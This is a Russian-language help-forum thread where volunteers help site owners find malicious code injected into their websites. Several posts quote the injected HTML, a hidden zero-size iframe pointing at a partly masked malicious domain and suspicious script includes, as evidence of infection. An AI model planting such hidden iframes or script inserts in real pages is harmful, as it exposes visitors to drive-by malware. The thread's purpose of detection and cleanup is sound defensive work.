Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
24,585
Реакции
13,563
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например https://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 
.htaccess - нет там ничего

Добавлено через 9 минут 50 секунд
ну и как мне быстро этот файлик вывернуть на изнанку, чтобы что увидеть??

Добавлено через 4 минуты 17 секунд
Чем раскомпилировать??? Чтобы быстро и наверняка, без особых навыков???
 
Взять файлик исходный до изменений (смотрим в последний файловый бекап или исходные файлы движка) и сравниваем. Если есть изменения, то файл необходимо заменить. Так же необходимо проверить модули (?ID?) на наличие неизвестных врезок. Если считаете это сложным, то лучше обратится сразу к профессионалам, которые досконально знают движок портала для проведения полного аудита.

Когда последний бекап делали?

Добавлено через 1 минуту 44 секунды
Чем раскомпилировать??? Чтобы быстро и наверняка, без особых навыков???
Без навыков никак.
 
И чем увидеть айфрейм, если его нету в коде с главной страницы?

Добавлено через 3 минуты 44 секунды
Ну есть родные файлы - разницы нет, сравнил уже и заменил .htaccess и mouseover.js для верности
 
В коде:
PHP:
</script><script type="text/javascript" src="http://istur.ru/templates/younews/src/mouseover.js"></script><style type="text/css">
.button,.validate,
.pollbuttons .button {
padding:0 0 4px 0px;
}
</style></head><body id="color"><iframe src="http://dyna55.***/index.php" height="0" width="0"></iframe>

Необходимо проверить содержимое всех файлов с эталоном. А так же необходимо обратится в вирлаб за помощью т.к. заражение довольно сложное для стандартных методов анализа.

http://support.kaspersky.ru/virlab/helpdesk.html

Добавлено через 23 минуты 23 секунды
И особенно присмотритесь:
[[[]]]://istur.ru/templates/younews/src/mouseover.js

akoK,

Привет! Слушай, но я тоже с этим сайтом и сервером вожусь уже ч\целый день, пробовали и скан делать через SSH и руками всё перевернули, ничего не нашли, кроме двух файлов которые относятся к другим сайтам ( на том же аккаунте ). То что ты скинул кусок кода, я не могу найти тоже самое. Вот то место
<![endif]-->
<script type="text/javascript" src="http://istur.ru/templates/younews/src/mouseover.js"></script>

</head>

<body id="color">


<div id="centertop" style="font-size:11px; width:960px;">

Это код главной страницы, когда по идеи подгружается всё что есть, и iframe нету.
Короче пока в тупике, ничего не нашли на этом сайте.
 
</script><script type="text/javascript" src="http://istur.ru/templates/younews/src/mouseover.js"></script><style type="text/css">
.button,.validate,
.pollbuttons .button {
padding:0 0 4px 0px;
}
</style></head><body id="color"><iframe src="http://dyna55.***/index.php" height="0" width="0"></iframe>
просто, как это найдено было и чем?
 
Лисой с отключенными NoScript и Adblock (спользовался как монитор) + просмотр кода. Ифрейм был обнаружен только 1 раз из 10 проверок.
 
Здесь /media/system/js/mootools.js

Открывал и смотрел его раз 5 точно, ничего не видел, пока через SSH не дал поиск по примерному слову , которое обычно используется в коде, только тогда нашёл его..

Могу код вирусняка выложить, так как большая часть сервисов проверок на вирусы вообще на него не реагировали, и включая siteguarg . Специально там зарегался, так он этот файл определил в безопасные :) я сегодня скинул им код для базы.
 
У меня на сайте не понятно откуда появился вирус, уже 4 дня воюю, пытаюсь найти, но безрезультатно. Сайт на юкозе, фреймовых окон нет,всплывающих банеров тоже. Помогите, сайт очень дорог мне, уже даже не знаю куда еще обращаться.
 
Очень много рекламы. Какой точно детект дают антивирусы? Нужно больше информации.

1. Уберите рекламу от Tizeroff
В их JS две интересные вставки
PHP:
<script type="text/javascript" src="http://golddeery.****/show-banner.php?kod=788462&amp;site=site.ru" - на который реагирует эвристика.

src="http://c***gedg.ru/iz.php" height="0" width="0">
 
хттп://forum.cfin.ru
ссылка на retwite.com блокирует eset.
еще разные антивиры ругались, выдавая сообщения, которые содержали в том числе:
1.19.03.2010 15:52:35 хттп://www.cfin.ru/ad/language/english/lang.js Обнаружено: HEUR:Trojan.Script.Iframer
2.URL: over-blog-com.alice.it.baixing-com.superseasilver.ru:8080/google.co.th/google.co.th/google.com/virginmedia.com/keepvid.com.php
Name: Link to known exploit site (type 750
 
micro, смотрю уже удалось удалить вредоносный код. Проверьте модули форума. Обновите форум до последней актуальной версии 3.8.5 + смените пароли администраторов и пароли для доступа к ftp
 
Назад
Сверху Снизу